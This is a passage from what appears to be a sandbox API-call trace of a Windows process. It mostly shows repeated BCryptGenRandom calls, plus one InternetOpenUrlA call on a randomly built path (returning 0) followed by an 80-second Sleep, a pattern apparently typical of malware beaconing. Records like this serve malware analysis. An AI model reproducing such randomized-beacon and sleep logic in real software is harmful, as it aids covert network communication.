cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01dcc, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a01dcc) returned 0x0 [0259.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.499] GetProcessHeap () returned 0x440000 [0259.499] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0259.499] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0259.499] lstrcatA (in: lpString1="\x04", lpString2="/D2dplAfjw7sr2moFu6g9D7/z72RT933hnq2wxbdqtxrJq5vs8wBt/aLAhj0ji7k9f84djlg5d4/AtmPhtcM7l6iko66jt7qf1szHpL4l3jI6byn24ycWvIdefd/gvdmwt80vc8Fy7wyiYqvpM8wK9UkQbNy9h/" | out: lpString1="\x04/D2dplAfjw7sr2moFu6g9D7/z72RT933hnq2wxbdqtxrJq5vs8wBt/aLAhj0ji7k9f84djlg5d4/AtmPhtcM7l6iko66jt7qf1szHpL4l3jI6byn24ycWvIdefd/gvdmwt80vc8Fy7wyiYqvpM8wK9UkQbNy9h/") returned="\x04/D2dplAfjw7sr2moFu6g9D7/z72RT933hnq2wxbdqtxrJq5vs8wBt/aLAhj0ji7k9f84djlg5d4/AtmPhtcM7l6iko66jt7qf1szHpL4l3jI6byn24ycWvIdefd/gvdmwt80vc8Fy7wyiYqvpM8wK9UkQbNy9h/" [0259.500] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0259.500] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/D2dplAfjw7sr2moFu6g9D7/z72RT933hnq2wxbdqtxrJq5vs8wBt/aLAhj0ji7k9f84djlg5d4/AtmPhtcM7l6iko66jt7qf1szHpL4l3jI6byn24ycWvIdefd/gvdmwt80vc8Fy7wyiYqvpM8wK9UkQbNy9h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0259.500] GetProcessHeap () returned 0x440000 [0259.500] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0259.500] GetProcessHeap () returned 0x440000 [0259.500] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01d50 | out: hHeap=0x440000) returned 1 [0259.500] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0259.506] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0259.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0259.506] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0259.506] Sleep (dwMilliseconds=0x139b7) [0259.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0259.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.641] GetProcessHeap () returned 0x440000 [0259.641] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01850 [0259.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01851, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a01851) returned 0x0 [0259.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.646] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01866, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a01866) returned 0x0 [0259.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.648] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.649] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.651] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.654] BCryptGenRandom (in: 